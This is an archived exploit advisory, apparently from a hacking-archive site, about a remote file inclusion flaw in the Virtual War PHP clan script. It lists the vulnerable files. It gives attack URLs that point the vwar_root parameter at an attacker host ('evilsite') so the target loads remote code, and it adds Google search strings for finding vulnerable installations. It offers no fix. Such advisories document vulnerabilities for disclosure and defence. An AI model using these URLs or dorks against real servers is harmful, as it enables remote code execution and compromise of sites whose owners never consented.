AOH :: HP Unsorted V :: B06-1495.HTM

Virtual war file inclusion



Virtual War File İnclusion
Virtual War File İnclusion



Virtual War File inclusion 
---------------------------------
Site:http://www.vwar.de/ 
Demo:http://www.vwar.de/demo/ 

---------------------------------------
File =DDnclusion


// get functions
$vwar_root = "./";

require ($vwar_root . "includes/functions_common.php");
require ($vwar_root . "includes/functions_front.php");


Vwar_root parameter File inclusion 

Aut File 

war.php,stats.php,news.php,joinus.php,challenge.php,calendar.php,member.php,popup.php

and 

all admin folder files

---------------------------------------
example

1)

http://victim.com/path/admin/admin.php?vwar_root=http://evilsite 

2)(phpnuke module)

http://victim.com/path/modules/vwar/admin/admin.php?vwar_root=http://evilsite 


-----------------------------------------
Credit:Liz0ziM
E-mail:liz0@bsdmail.com 
Site:www.biyo.tk www.biyosecurity.be 

-----------------------------------------
google:

"Powered by: Virtual War v1.5.0"

inurl:"modules.php?name=vwar"

-------------------------------------

Source:
http://www.blogcu.com/Liz0ziM/431925/ 
http://liz0zim.no-ip.org/vwar.txt 

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.